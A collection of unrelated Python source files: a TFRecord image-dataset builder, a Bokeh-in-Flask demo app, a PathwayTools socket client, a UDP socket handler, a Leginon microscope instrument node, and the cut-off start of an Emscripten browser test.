ymax = image_bboxes.get('ymax', [])
bbox_scores = image_bboxes.get('score', [])
bbox_labels = image_bboxes.get('label', [])
bbox_text = list(map(_validate_text, image_bboxes.get('text', [])))
bbox_label_confs = image_bboxes.get('conf', [])
# Parts
image_parts = image_objects.get('parts', {})
parts_x = image_parts.get('x', [])
parts_y = image_parts.get('y', [])
parts_v = image_parts.get('v', [])
parts_s = image_parts.get('score', [])
# Areas
object_areas = image_objects.get('area', [])
# Ids
object_ids = list(map(_str_and_encode, image_objects.get('id', [])))
# Any extra data (e.g. stringified json)
extra_info = str(image_class.get('extra', '')).encode()
# Additional fields for the format needed by the Object Detection repository
key = hashlib.sha256(image_buffer).hexdigest().encode()
is_crowd = image_objects.get('is_crowd', [])
# For explanation of the fields, see https://github.com/visipedia/tfrecords
example = tf.train.Example(features=tf.train.Features(feature={
'image/height': _int64_feature(height),
'image/width': _int64_feature(width),
'image/colorspace': _bytes_feature(colorspace.encode()),
'image/channels': _int64_feature(channels),
'image/format': _bytes_feature(image_format.encode()),
'image/filename': _bytes_feature(filename),
'image/id': _bytes_feature(image_id),
'image/encoded': _bytes_feature(image_buffer),
'image/extra': _bytes_feature(extra_info),
'image/class/label': _int64_feature(class_label),
'image/class/text': _bytes_feature(class_text),
'image/class/conf': _float_feature(class_conf),
'image/object/bbox/xmin': _float_feature(xmin),
'image/object/bbox/xmax': _float_feature(xmax),
'image/object/bbox/ymin': _float_feature(ymin),
'image/object/bbox/ymax': _float_feature(ymax),
'image/object/bbox/label': _int64_feature(bbox_labels),
'image/object/bbox/text': _bytes_feature(bbox_text),
'image/object/bbox/conf': _float_feature(bbox_label_confs),
'image/object/bbox/score': _float_feature(bbox_scores),
'image/object/parts/x': _float_feature(parts_x),
'image/object/parts/y': _float_feature(parts_y),
'image/object/parts/v': _int64_feature(parts_v),
'image/object/parts/score': _float_feature(parts_s),
'image/object/count': _int64_feature(object_count),
'image/object/area': _float_feature(object_areas),
'image/object/id': _bytes_feature(object_ids),
# Additional fields for format needed by Object Detection repository
'image/source_id': _bytes_feature(image_id),
'image/key/sha256': _bytes_feature(key),
'image/object/class/label': _int64_feature(bbox_labels),
'image/object/class/text': _bytes_feature(bbox_text),
'image/object/is_crowd': _int64_feature(is_crowd)
}))
return example
class ImageCoder:
"""Helper class that provides TensorFlow image coding utilities."""
def __init__(self):
# Create a single Session to run all image coding calls.
self._sess = tf.Session()
# Initializes function that converts PNG to JPEG data.
self._png_ph = tf.placeholder(dtype=tf.string)
image = tf.image.decode_png(self._png_ph, channels=3)
self._png_to_jpeg = tf.image.encode_jpeg(
image, format='rgb', quality=100)
# Initializes function that decodes RGB JPEG data.
self._decode_jpeg_ph = tf.placeholder(dtype=tf.string)
self._decode_jpeg = tf.image.decode_jpeg(
self._decode_jpeg_ph, channels=3)
def png_to_jpeg(self, image_data):
# Convert the image data from png to jpg
return self._sess.run(self._png_to_jpeg,
feed_dict={self._png_ph: image_data})
def decode_jpeg(self, image_data):
# Decode the image data as a jpeg image
image = self._sess.run(self._decode_jpeg, feed_dict={
self._decode_jpeg_ph: image_data})
assert len(image.shape) == 3, "JPEG must be 3-D (H x W x C)"
assert image.shape[2] == 3, "JPEG needs to have 3 channels (RGB)"
return image
def _is_png(filename):
"""Determine if a file contains a PNG format image.
Args:
filename: string, path of the image file.
Returns:
boolean indicating if the image is a PNG.
"""
_, file_extension = os.path.splitext(filename)
return file_extension.lower() == '.png'
def _process_image(filename, coder):
"""Process a single image file.
Args:
filename: string, path to an image file e.g., '/path/to/example.JPG'.
coder: instance of ImageCoder to provide TensorFlow image coding utils.
Returns:
image_buffer: string, JPEG encoding of RGB image.
height: integer, image height in pixels.
width: integer, image width in pixels.
"""
# Read the image file.
image_data = tf.gfile.FastGFile(filename, 'rb').read() # changed to 'rb' per https://github.com/tensorflow/tensorflow/issues/11312
# Clean the dirty data.
if _is_png(filename):
image_data = coder.png_to_jpeg(image_data)
# Decode the RGB JPEG.
image = coder.decode_jpeg(image_data)
# Check that image converted to RGB
assert len(image.shape) == 3
height = image.shape[0]
width = image.shape[1]
assert image.shape[2] == 3
return image_data, height, width
def _process_image_files_batch(coder, thread_index, ranges, name, output_directory,
dataset, num_shards, store_images, error_queue):
"""Processes and saves list of images as TFRecord in 1 thread.
Args:
coder: instance of ImageCoder to provide TensorFlow image coding utils.
thread_index: integer, unique batch to run index is within [0, len(ranges)).
ranges: list of pairs of integers specifying ranges of each batches to
analyze in parallel.
name: string, unique identifier specifying the data set (e.g. `train` or `test`)
output_directory: string, file path to store the tfrecord files.
dataset: list, a list of image example dicts
num_shards: integer number of shards for this data set.
store_images: bool, should the image be stored in the tfrecord
error_queue: Queue, a queue to place image examples that failed.
"""
# Each thread produces N shards where N = int(num_shards / num_threads).
# For instance, if num_shards = 128, and the num_threads = 2, then the first
# thread would produce shards [0, 64).
num_threads = len(ranges)
assert not num_shards % num_threads
num_shards_per_batch = int(num_shards / num_threads)
shard_ranges = np.linspace(ranges[thread_index][0],
ranges[thread_index][1],
num_shards_per_batch + 1).astype(int)
num_files_in_thread = ranges[thread_index][1] - ranges[thread_index][0]
counter = 0
error_counter = 0
for s in range(num_shards_per_batch):
# Generate a sharded version of the file name, e.g. 'train-00002-of-00010'
shard = thread_index * num_shards_per_batch + s
output_filename = '%s-%.5d-of-%.5d' % (name, shard, num_shards)
output_file = os.path.join(output_directory, output_filename)
writer = tf.io.TFRecordWriter(output_file)
shard_counter = 0
files_in_shard = np.arange(shard_ranges[s], shard_ranges[s + 1], dtype=int)
for i in files_in_shard:
image_example = dataset[i]
filename = str(image_example['filename'])
try:
if store_images:
if 'encoded' in image_example:
image_buffer = image_example['encoded']
height = image_example['height']
width = image_example['width']
colorspace = image_example['colorspace']
image_format = image_example['format']
num_channels = image_example['channels']
example = _convert_to_example(image_example, image_buffer, height,
width, colorspace, num_channels,
image_format)
else:
image_buffer, height, width = _process_image(filename, coder)
example = _convert_to_example(image_example, image_buffer, height,
width)
else:
image_buffer=''
height = int(image_example['height'])
width = int(image_example['width'])
example = _convert_to_example(image_example, image_buffer, height,
width)
writer.write(example.SerializeToString())
shard_counter += 1
counter += 1
except Exception as e:
#raise
print('Exception in making example for {}.'.format(i))
print('Filename: {}'.format(filename))
error_counter += 1
error_msg = repr(e)
image_example['error_msg'] = error_msg
error_queue.put(image_example)
if not counter % 1000:
print('%s [thread %d]: Processed %d of %d images in thread batch, with %d errors.' %
(datetime.now(), thread_index, counter, num_files_in_thread, error_counter))
sys.stdout.flush()
print('%s [thread %d]: Wrote %d images to %s, with %d errors.' %
(datetime.now(), thread_index, shard_counter, output_file, error_counter))
sys.stdout.flush()
shard_counter = 0
print('%s [thread %d]: Wrote %d images to %d shards, with %d errors.' %
(datetime.now(), thread_index, counter, num_files_in_thread, error_counter))
sys.stdout.flush()
def create(dataset, dataset_name, output_directory, num_shards, num_threads, shuffle=True, store_images=True):
"""Create the tfrecord files to be used to train or test a model.
Args:
dataset : [{
"filename" : <REQUIRED: path to the image file>,
"id" : <REQUIRED: id of the image>,
"class" : {
"label" : <[0, num_classes)>,
"text" : <text description of class>
},
"object" : {
"bbox" : {
"xmin" : [],
"xmax" : [],
"ymin" : [],
"ymax" : [],
"label" : []
}
}
}]
dataset_name: a name for the dataset
output_directory: path to a directory to write the tfrecord files
num_shards: the number of tfrecord files to create
num_threads: the number of threads to use
shuffle : bool, should the image examples be shuffled or not prior to creating the tfrecords.
Returns:
list : a list of image examples that failed to process.
"""
# Images in the tfrecords set must be shuffled properly
if shuffle:
random.shuffle(dataset)
# Break all images into batches with a [ranges[i][0], ranges[i][1]].
spacing = np.linspace(0, len(dataset), num_threads + 1).astype(np.int)
ranges = []
threads = []
for i in range(len(spacing) - 1):
ranges.append([spacing[i], spacing[i+1]])
# Launch a thread for each batch.
print('Launching %d threads for spacings: %s' % (num_threads, ranges))
sys.stdout.flush()
# Create a mechanism for monitoring when all threads are finished.
coord = tf.train.Coordinator()
# Create a generic TensorFlow-based utility for converting all image codings.
coder = ImageCoder()
# A Queue to hold the image examples that fail to process.
error_queue = Queue()
threads = []
for thread_index in range(len(ranges)):
args = (coder, thread_index, ranges, dataset_name, output_directory, dataset,
num_shards, store_images, error_queue)
t = threading.Thread(target=_process_image_files_batch, args=args)
t.start()
threads.append(t)
# Wait for all the threads to terminate.
coord.join(threads)
print('%s: Finished writing all %d images in data set.' %
(datetime.now(), len(dataset)))
# Collect the errors
errors = []
while not error_queue.empty():
errors.append(error_queue.get())
print('%d examples failed.' % (len(errors),))
return errors
def parse_args():
parser = argparse.ArgumentParser(description='Basic statistics on tfrecord files')
parser.add_argument('--dataset_path', dest='dataset_path',
help='Path to the dataset json file.', type=str,
required=True)
parser.add_argument('--prefix', dest='dataset_name',
help='Prefix for the tfrecords (e.g. `train`, `test`, `val`).', type=str,
required=True)
parser.add_argument('--output_dir', dest='output_dir',
help='Directory for the tfrecords.', type=str,
required=True)
parser.add_argument('--shards', dest='num_shards',
help='Number of shards to make.', type=int,
required=True)
parser.add_argument('--threads', dest='num_threads',
help='Number of threads to make.', type=int,
required=True)
parser.add_argument('--shuffle', dest='shuffle',
help='Shuffle the records before saving them.',
required=False, action='store_true', default=False)
parser.add_argument('--store_images', dest='store_images',
help='Store the images in the tfrecords.',
required=False, action='store_true', default=False)
parsed_args = parser.parse_args()
return parsed_args
def main():
args = parse_args()
with open(args.dataset_path) as f:
dataset = json.load(f)
errors = create(
dataset=dataset,
dataset_name=args.dataset_name,
output_directory=args.output_dir,
num_shards=args.num_shards,
num_threads=args.num_threads,
shuffle=args.shuffle,
store_images=args.store_images
)
return errors
if __name__ == '__main__':
main()
|
bkapp.py | """
Embed bokeh server session into a flask framework
Adapted from bokeh-master/examples/howto/serve_embed/flask_gunicorn_embed.py
"""
import os
import time
import asyncio
import logging
from threading import Thread
from tornado.httpserver import HTTPServer
from tornado.ioloop import IOLoop
from bokeh import __version__ as bokeh_release_ver
from bokeh.application import Application
from bokeh.application.handlers import FunctionHandler
from bokeh.plotting import figure
from bokeh.sampledata.sea_surface_temperature import sea_surface_temperature
from bokeh.server.server import BaseServer
from bokeh.server.tornado import BokehTornado
from bokeh.server.util import bind_sockets
from bokeh.themes import Theme
from bokeh.layouts import column
from bokeh.resources import get_sri_hashes_for_version
from bokeh.models.widgets import DateFormatter, TableColumn, DataTable
from bokeh.models import (
ColumnDataSource,
Slider
)
from config import (
cwd,
set_bokeh_port,
FLASK_PORT,
FLASK_ADDR,
BOKEH_ADDR,
BOKEH_URL,
BOKEH_CDN
)
logging.basicConfig(level=logging.INFO)
log = logging.getLogger(__name__)
BOKEH_BROWSER_LOGGING = """
<script type="text/javascript">
Bokeh.set_log_level("debug");
</script>
"""
def bkapp_blue(doc):
""" Bokeh App
Arguments:
doc {Bokeh Document} -- bokeh document
Returns:
Bokeh Document --bokeh document with plot and slider
"""
dataframe = sea_surface_temperature.copy()
source = ColumnDataSource(data=dataframe)
plot = figure(x_axis_type='datetime', y_range=(0, 25),
y_axis_label='Temperature (Celsius)',
title="Blue App - Sea Surface Temperature at 43.18, -70.43")
plot.line(x='time', y='temperature', source=source)
def callback(_attr, _old, new):
if new == 0:
data = dataframe
else:
data = dataframe.rolling('{0}D'.format(new)).mean()
source.data = ColumnDataSource.from_df(data)
slider = Slider(start=0, end=30, value=0, step=1, title="Application Blue")
slider.on_change('value', callback)
doc.theme = Theme(filename=os.path.join(cwd(), 'theme.yaml'))
return doc.add_root(column(slider, plot))
def bkapp_red(doc):
""" Bokeh App
Arguments:
doc {Bokeh Document} -- bokeh document
Returns:
Bokeh Document --bokeh document with plot and slider
"""
dataframe = sea_surface_temperature.copy()
source = ColumnDataSource(data=dataframe)
plot = figure(x_axis_type='datetime', y_range=(0, 25),
y_axis_label='Temperature (Celsius)',
title="Red App - Sea Surface Temperature at 43.18, -70.43")
plot.line(x='time', y='temperature', source=source, line_color='red')
def callback(_attr, _old, new):
if new == 0:
data = dataframe
else:
data = dataframe.rolling('{0}D'.format(new)).mean()
source.data = ColumnDataSource.from_df(data)
slider = Slider(start=0, end=30, value=0, step=1, title="Application Red")
slider.on_change('value', callback)
doc.theme = Theme(filename=os.path.join(cwd(), 'theme.yaml'))
return doc.add_root(column(slider, plot))
def bkapp_table(doc):
"""Create a Table App
Arguments:
doc {Document} -- bokeh document
Returns:
Document -- updated bokeh document
"""
data = sea_surface_temperature.copy()
data.reset_index(inplace=True)
source = ColumnDataSource(data=data)
columns = [
TableColumn(field='time', title='Time', formatter=DateFormatter(format='yy-mm-dd')),
TableColumn(field='temperature', title='Temperature')
]
data_table = DataTable(source=source, columns=columns, width=400,
selectable='checkbox', index_position=None)
doc.theme = Theme(filename=os.path.join(cwd(), 'theme.yaml'))
return doc.add_root(data_table)
def bokeh_cdn_resources():
"""Create script to load Bokeh resources from CDN based on
installed bokeh version.
Returns:
script -- script to load resources from CDN
"""
included_resources = [
f'bokeh-{bokeh_release_ver}.min.js',
f'bokeh-api-{bokeh_release_ver}.min.js',
f'bokeh-tables-{bokeh_release_ver}.min.js',
f'bokeh-widgets-{bokeh_release_ver}.min.js'
]
resources = '\n '
for key, value in get_sri_hashes_for_version(bokeh_release_ver).items():
if key in included_resources:
resources += '<script type="text/javascript" '
resources += f'src="{BOKEH_CDN}/{key}" '
resources += f'integrity="sha384-{value}" '
resources += 'crossorigin="anonymous"></script>\n '
resources += BOKEH_BROWSER_LOGGING
return resources
def get_sockets():
"""bind to available socket in this system
Returns:
sockets, port -- sockets and port bind to
"""
_sockets, _port = bind_sockets('0.0.0.0', 0)
set_bokeh_port(_port)
return _sockets, _port
# two applications running in a bokeh server
_bkapp_blue = Application(FunctionHandler(bkapp_blue))
_bkapp_red = Application(FunctionHandler(bkapp_red))
_bkapp_table = Application(FunctionHandler(bkapp_table))
def bk_worker(sockets, port):
""" Worker thread to run Bokeh Server """
asyncio.set_event_loop(asyncio.new_event_loop())
websocket_origins = [f"{BOKEH_ADDR}:{port}", f"{FLASK_ADDR}:{FLASK_PORT}"]
bokeh_tornado = BokehTornado({"/bkapp-blue": _bkapp_blue,
"/bkapp-red": _bkapp_red,
"/bkapp-table": _bkapp_table},
extra_websocket_origins=websocket_origins,
**{'use_xheaders': True})
bokeh_http = HTTPServer(bokeh_tornado, xheaders=True)
bokeh_http.add_sockets(sockets)
server = BaseServer(IOLoop.current(), bokeh_tornado, bokeh_http)
server.start()
server.io_loop.start()
if __name__ == '__main__':
bk_sockets, bk_port = get_sockets()
t = Thread(target=bk_worker, args=[bk_sockets, bk_port], daemon=True)
t.start()
bokeh_url = BOKEH_URL.replace('$PORT', str(bk_port))
log.info("Bokeh Server App Running at: %s", bokeh_url)
while True:
time.sleep(0.05)
|
pathway.py | #!/usr/bin/python -w
import socket, re, sys
from os import _exit
import re
from libs.python_modules.utils.sysutil import getstatusoutput
from multiprocessing import Process
import time
class PythonCyc:
_organism = 'meta'
soc = None
def __init__(self):
pass
def setOrganism(self, organism):
self._organism = organism
def makeSocket(self):
self.soc = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
self.soc.connect("/tmp/ptools-socket" )
def tokenize(self,string):
LPAREN = '\(';
RPAREN = '\)';
WSPACE = '\s+';
STRING = '\"[^"]*?\"';
PIPES = '\|[^\|]*?\|';
regexp = re.compile(r'' + "(" + LPAREN + "|" + RPAREN + "|" + STRING + "|"+PIPES+ ")" + "|" + WSPACE)
_tokens = [ x.strip() for x in regexp.split(string) if x ]
removePipes = re.compile(r'\|([^|]*)\|')
tokens = []
for _token in _tokens:
tokens.append(re.sub(removePipes, r'', _token) ) #@tokens; ## removes outer pipes from the string.
return tokens;
def parseLisp(self, string):
tokens = self.tokenize(string)
parsed_expr = self.parseExpr(tokens)
return parsed_expr
def parseExpr(self, tokens):
if not tokens:
return []
if tokens[0]== '(':
tokens.pop(0)
list_elements = []
while tokens[0] != ')' :
toAddResult = self.parseExpr(tokens)
if toAddResult:
list_elements.append(toAddResult)
tokens.pop(0)
return list_elements
elif not tokens[0] :
tokens.pop(0)
return []
else :
return tokens.pop(0)
def send_query(self, query):
self.makeSocket()
self.soc.send(query)
def retrieve_results(self):
data = '';
while True:
_data = self.soc.recv(1024)
if not _data:
break
data += _data
return self.parseLisp(data)
def retrieve_results_string(self):
data = '';
results = []
while True:
_data = self.soc.recv(1024)
if not _data:
break
_data = _data.strip()
if _data != None:
results.append(_data)
return ''.join(results)
def getOrganismList(self):
negPatterns = [ re.compile(r'^ECOBASES'), re.compile(r'^[#@]') ]
posPatterns = [ re.compile(r'BASE$') ]
query= "(mapcar #'object-name (all-orgs :all))"
self.send_query(query)
data = self.retrieve_results()
if not data :
return []
organisms = []
for _datum in data:
if not _datum:
continue
datum = _datum.strip()
for patt in negPatterns:
result = patt.search(datum)
if result:
continue
result = posPatterns[0].search(datum)
if not result:
continue
organisms.append(datum)
return organisms
def stopPathwayTools(self):
query= "(exit)"
self.send_query(query)
def wrap_query(self, function ):
lisp = "(with-organism (:org-id\'%s) (mapcar #\'object-name(%s)))"\
%(self._organism, function)
return lisp
def call_func(self, function):
self.send_query(self.wrap_query(function))
result = self.retrieve_results()
return result
def genes_of_pathway(self, pathway, T):
function = "genes-of-pathway \'%s" %(pathway)
result = self.call_func(function)
return result
def genes_of_reaction(self, reaction, T):
function = "genes-of-reaction \'%s" %(reaction)
result = self.call_func(function)
return result
def protectFrameName(self, frame):
pipePatt = re.compile(r'^\|.*\|$') ## if already pipe protected, don't do anything.
status = pipePatt.search(frame)
if status:
return frame
if len(frame.strip())==0:
return "|" + frame + "|"
return frame
def get_slot_values(self, frame, slot_name):
try:
frame = self.protectFrameName(frame)
function = "get-slot-values \'%s \'%s" %(frame, slot_name)
result = self.call_func(function)
return result
except:
print frame, slot_name
_exit(0)
def get_slot_value(self, frame, slot_name):
try:
frame = self.protectFrameName(frame)
function = "get-slot-value \'%s \'%s" %(frame, slot_name)
result = self.call_func_that_returns_string(function)
return result
except:
print frame, slot_name
_exit(0)
def call_func_that_returns_string(self, function):
# use for functions that will return a string and not a list.
# this function doesn't call mapcar and doesn't parse the returned list.
query = "(with-organism (:org-id\'%s) (object-name (%s)))" %(self._organism, function);
self.send_query (query)
result = self.retrieve_results_string()
return result
def startPathwayTools(self):
process = Process(target=startPathwayTools)
process.start()
time.sleep(5)
def startPathwayTools():
cmd = "~/pathway-tools/pathway-tools -api"
status = getstatusoutput(cmd)
if __name__=="__main__":
pythonCyc = PythonCyc()
try:
pythonCyc.stopPathwayTools()
except:
print "nothing to stop"
pythonCyc.startPathwayTools()
print 'connecting'
my_base_pathways = pythonCyc.call_func("all-pathways :all T")
pwy_count=0
unique_rxns ={}
for pathway in my_base_pathways:
pwy_count +=1
mygenes = pythonCyc.genes_of_pathway(pathway,'T')
totalrxns = pythonCyc.get_slot_values(pathway, "REACTION-LIST")
for rxn in totalrxns:
unique_rxns[rxn] = 1
pathway_common_name = pythonCyc.get_slot_value(pathway,"common-name")
if not pathway_common_name:
pathway_common_name = "?"
num_reactions = len(totalrxns)
num_predicted_orfs = len(mygenes)
num_covered_rxns =0
num_genes =0
orf_strings = {}
for reaction in totalrxns :
rngenes = pythonCyc.genes_of_reaction(reaction,"T")
rxngenes = []
for rngene in rngenes:
rxngenes.append(pythonCyc.get_slot_value(rngene,"common-name"))
if rxngenes: #this reaction is covered
num_covered_rxns+= 1
rxn_name = pythonCyc.get_slot_value(reaction,"common-name")
if not rxn_name:
rxn_name = '???'
if reaction in unique_rxns:
unique_rxns[reaction]= {}
unique_rxns[reaction]['name'] = rxn_name
unique_rxns[reaction]['ORFs'] = rxngenes
if rxngenes:
unique_rxns[reaction]['covered']= 1
else :
unique_rxns[reaction]['covered']= 0
unique_rxns[reaction]['num_pwys']= 1
else :
unique_rxns[reaction]['covered']= 1
unique_rxns[reaction]['num_pwys']+=1
num_genes += len(rxngenes);
for rxngene in rxngenes:
orf_strings[rxngene] =1
# done for the reactions in a pathway
outputstr = "PWY:" + "\t" + pathway + "\t" + pathway_common_name\
+ "\t" + str(num_reactions) + "\t" + str(num_covered_rxns) + "\t" + str(num_predicted_orfs)
for orf_string in orf_strings.keys():
outputstr += "\t" + orf_string
outputstr += "\n";
# printing the reactions MOST important paert of the calculation
rxnOutputStr="";
for reaction in unique_rxns.keys():
rxnOutputStr = reaction + "\t" + unique_rxns[reaction]['name']
for orf in unique_rxns[reaction]['ORFs']:
rxnOutputStr += "\t" + orf
rxnOutputStr +="\n";
print rxnOutputStr
pythonCyc.stopPathwayTools()
|
socketHandler.py | # Source: https://pymotw.com/2/socket/udp.html
"""
This file contains the class SocketHandler, which handles both sending and receiving messages through sockets.
One SocketHandler is needed to handle all connections.
Written by Dorian Wang
"""
import socket
import sys
import time
import json
import threading
import select
import logging
import queue
# https://stackoverflow.com/questions/15727420/using-python-logging-in-multiple-modules
if __name__ == "__main__":
logging.basicConfig(stream=sys.stdout, level=logging.DEBUG)
try:
textport = sys.argv[1]
except:
textport = 12345
log = logging.getLogger(__name__)
class SocketHandler:
"""
How to use this object:
First add listeners to different ports. Then use the run() function to start the listener thread.
Send data by calling socketsender(). data and host should be strings, port is a int
To get the data call getinput(). This returns a tuple, the first value is data, the second is the sending address.
If the input buffer is empty, getinput() will return None.
"""
# https://stackoverflow.com/questions/15365406/run-class-methods-in-threads-python
def __init__(self):
self.run_thread = True
self.inputbuffer = queue.Queue()
self.inputbufferlock = threading.Lock()
self.listeners = []
self.listenerslock = threading.Lock()
self.outputbuffer = []
self.outputbufferlock = threading.Lock()
def addlistener(self, port):
if len(self.listeners) > 0:
tempports = [listener[0] == port for listener in self.listeners]
print(tempports)
if True in tempports:
return False
newsocket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
server_address = ('', port)
newsocket.bind(server_address)
newsocket.setblocking(0)
newlistener = (port, newsocket)
self.listenerslock.acquire()
self.listeners.append(newlistener)
self.listenerslock.release()
return True
def removelistener(self, port):
"""
This function removes a listener from the list. If there is no port attached, nothing happens
:param port: the port the listener is attached to
:return: No return
"""
listenerslock.acquire()
if (listener[0] == port for listener in self.listeners):
listener[1].shutdown()
self.listeners.remove(listener)
listenerslock.release()
def socketlistener(self):
"""
This function is run by a thread and places all data into the input buffer.
It hopefully doesn't really need to be threaded but I did so anyways. \o.o/
"""
while self.run_thread:
self.listenerslock.acquire()
templisteners = [listener[1] for listener in self.listeners]
ready_to_read, ready_to_write, in_error = \
select.select(templisteners, [], [], 10.0) # 10 second timeout, should work
for s in ready_to_read:
buf, address = s.recvfrom(8192)
self.inputbufferlock.acquire()
self.inputbuffer.put_nowait((buf, address))
log.info("Received %s bytes from %s: " % (len(buf), address))
self.inputbufferlock.release()
self.listenerslock.release()
time.sleep(0.1)
def socketsender(self, host, port, data):
port = int(port)
if port < 1 or port > 65535:
log.error("port number out of range in socketsender")
return None
port = int(port)
target_address = (host, port)
print(target_address)
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
# s.bind(target_address)
if not len(data):
s.shutdown(1)
return None
print(s.sendto(data.encode('utf-8'), target_address))
s.shutdown(1)
return not None
def getinput(self):
if self.inputbuffer.empty():
return None
self.inputbufferlock.acquire()
value = self.inputbuffer.get_nowait()
self.inputbufferlock.release()
return value
def run(self):
t = threading.Thread(target=self.socketlistener)
t.start()
|
EM.py | #
# COPYRIGHT:
# The Leginon software is Copyright 2003
# The Scripps Research Institute, La Jolla, CA
# For terms of the license agreement
# see http://ami.scripps.edu/software/leginon-license
#
from leginon import leginondata
import instrument
import node
import socket
import threading
import gui.wx.Instrument
from pyscope import tem, ccdcamera, registry
import sys
class EM(node.Node):
panelclass = gui.wx.Instrument.Panel
def __init__(self, name, session, managerlocation, tcpport=None, **kwargs):
self.instruments = {}
self.pauses = {
'magnification': 1.5,
'spot size': 0.4,
'image shift': 0.2,
'beam shift': 0.1,
'defocus': 0.4,
'focus': 0.4,
'intensity': 0.1,
'main screen position': 1.0,
}
node.Node.__init__(self, name, session, managerlocation, **kwargs)
# the handler thread waits for queue requests and processes them
# scope and camera are typically COM objects and need to be initialized
# in this thread
self.exitevent = threading.Event()
self.handlerthread = threading.Thread(name='EM handler thread',
target=self.handler)
self.handlerthread.start()
#self.handler()
def exit(self):
node.Node.exit(self)
'''
for i in self.instruments:
try:
i.exit()
except:
pass
'''
self.instruments = {}
self.exitevent.set()
def handler(self):
classes = registry.getClasses()
tems = []
ccdcameras = []
for i in classes:
name, c = i
if issubclass(c, tem.TEM):
tems.append(i)
elif issubclass(c, ccdcamera.CCDCamera):
ccdcameras.append(i)
for name, c in tems + ccdcameras:
if issubclass(c, tem.TEM):
instrumentclass = instrument.TEM
wxaddmethod = self.panel.addTEM
elif issubclass(c, ccdcamera.CCDCamera):
instrumentclass = instrument.CCDCamera
wxaddmethod = self.panel.addCCDCamera
class ObjectClass(c, instrumentclass):
def __init__(self):
self._hostname = socket.gethostname().lower()
c.__init__(self)
instrumentclass.__init__(self)
def getHostname(self):
return self._hostname
def getCs(self):
return self.cs
tries = 3
instance = None
for i in range(1,tries+1):
try:
instance = ObjectClass()
self.instruments[name] = instance
self.objectservice._addObject(name, instance)
self.logger.info('Added interface for %s' % name)
break
except Exception, e:
self.logger.debug('Initialization of %s failed: %s' % (name, e))
continue
if instance is None:
continue
if self.hasMagnifications(name):
self.initializeMagnifications(name)
wxaddmethod(name)
if not self.instruments:
self.logger.warning('No interfaces could be initiailized')
self.start()
# exiting this thread seems to disconnect the COM servers
self.exitevent.wait()
def hasMagnifications(self, name):
try:
instance = self.instruments[name]
except KeyError:
raise ValueError('no instrument %s' % name)
if not hasattr(instance, 'getMagnificationsInitialized'):
return False
if not hasattr(instance, 'setMagnifications'):
return False
return True
def initializeMagnifications(self, name):
try:
instance = self.instruments[name]
except KeyError:
raise ValueError('no instrument %s' % name)
if instance.getMagnificationsInitialized():
return
instrumentdata = leginondata.InstrumentData()
instrumentdata['name'] = name
instrumentdata['hostname'] = instance.getHostname()
queryinstance = leginondata.MagnificationsData()
queryinstance['instrument'] = instrumentdata
try:
result = self.research(queryinstance, results=1)[0]
except IndexError:
self.logger.warning('No magnifications saved for %s' % name)
return
self.setProjectionSubModeMap(instance, result)
instance.setMagnifications(result['magnifications'])
def setProjectionSubModeMap(self, instance, maglistdata):
mode_map = {}
# find
if maglistdata:
mapq = leginondata.ProjectionSubModeMappingData()
mapq['magnification list'] = maglistdata
map_results = mapq.query()
for mapping in map_results:
if mapping['magnification'] not in mode_map.keys():
mode_map[mapping['magnification']] = (mapping['name'], mapping['submode index'])
instance.setProjectionSubModeMap(mode_map)
def getMagnifications(self, name):
try:
instance = self.instruments[name]
except KeyError:
raise ValueError('no instrument %s' % name)
self.logger.info('Getting magnifications from the instrument...')
# This sets both magnifications and projection submode mappings
instance.findMagnifications()
magnificationsdata = self.saveMagnifications(instance,name)
self.saveProjectionSubMap(instance,name,magnificationsdata)
self.panel.onGetMagnificationsDone()
def saveMagnifications(self, instance, tem_name):
self.logger.info('Saving...')
instrumentdata = leginondata.InstrumentData()
instrumentdata['name'] = tem_name
instrumentdata['hostname'] = instance.getHostname()
instrumentdata['cs'] = instance.getCs()
magnificationsdata = leginondata.MagnificationsData()
magnificationsdata['instrument'] = instrumentdata
magnificationsdata['magnifications'] = instance.getMagnifications()
self.publish(magnificationsdata, database=True, dbforce=True)
self.logger.info('Magnifications saved.')
return magnificationsdata
def saveProjectionSubMap(self, instance, tem_name, magnificationsdata):
#Get ProjectionSubModeMapping
try:
mappings = instance.getProjectionSubModeMap()
except KeyError:
raise ValueError('no projection submode mappings %s' % tem_name)
self.logger.info('Saving Projection Submode Mappings...')
for mag in magnificationsdata['magnifications']:
mappingsdata = leginondata.ProjectionSubModeMappingData()
mappingsdata['magnification list'] = magnificationsdata
mappingsdata['magnification'] = mag
mappingsdata['name'] = mappings[mag][0]
mappingsdata['submode index'] = mappings[mag][1]
self.publish(mappingsdata, database=True, dbforce=True)
self.logger.info('Submode mappings saved.')
def resetDefocus(self, name):
self.instruments[name]._execute(self.name, 'resetDefocus', 'method')
def refresh(self, name, attributes):
# hack
self.logger.info('Refreshing parameters for %s...' % name)
try:
instrument = self.instruments[name]
except KeyError:
self.logger.info('Refreshing failed.' % name)
return
values = {}
instrument.lock(self.name)
try:
if isinstance(attributes, list):
for attribute in attributes:
try:
value = instrument._execute(self.name, attribute, 'r')
if isinstance(value, Exception):
raise
else:
values[attribute] = value
except TypeError:
# in theory this is an invalid execution name
pass
except:
self.logger.warning('Failed to refresh attribute \'%s\''
% attribute)
elif isinstance(attributes, dict):
for attribute, value in attributes.items():
try:
value = instrument._execute(self.name, attribute, 'w', (value,))
if isinstance(value, Exception):
raise
else:
values[attribute] = value
value = instrument._execute(self.name, attribute, 'r')
if isinstance(value, Exception):
raise
else:
values[attribute] = value
except TypeError:
# in theory this is an invalid execution name
pass
except AttributeError:
self.logger.warning('Failed to refresh attribute \'%s\''
% attribute)
else:
pass
finally:
instrument.unlock(self.name)
self.panel.setParameters(name, values)
self.logger.info('Refresh completed.')
|
test_browser.py | import BaseHTTPServer, multiprocessing, os, shutil, subprocess, unittest, zlib, webbrowser, time, shlex
from runner import BrowserCore, path_from_root, nonfastcomp
from tools.shared import *
# User can specify an environment variable EMSCRIPTEN_BROWSER to force the browser test suite to
# run using another browser command line than the default system browser.
emscripten_browser = os.environ.get('EMSCRIPTEN_BROWSER')
if emscripten_browser:
cmd = shlex.split(emscripten_browser)
def run_in_other_browser(url):
Popen(cmd + [url])
webbrowser.open_new = run_in_other_browser
def test_chunked_synchronous_xhr_server(support_byte_ranges, chunkSize, data, checksum):
class ChunkedServerHandler(BaseHTTPServer.BaseHTTPRequestHandler):
def sendheaders(s, extra=[], length=len(data)):
s.send_response(200)
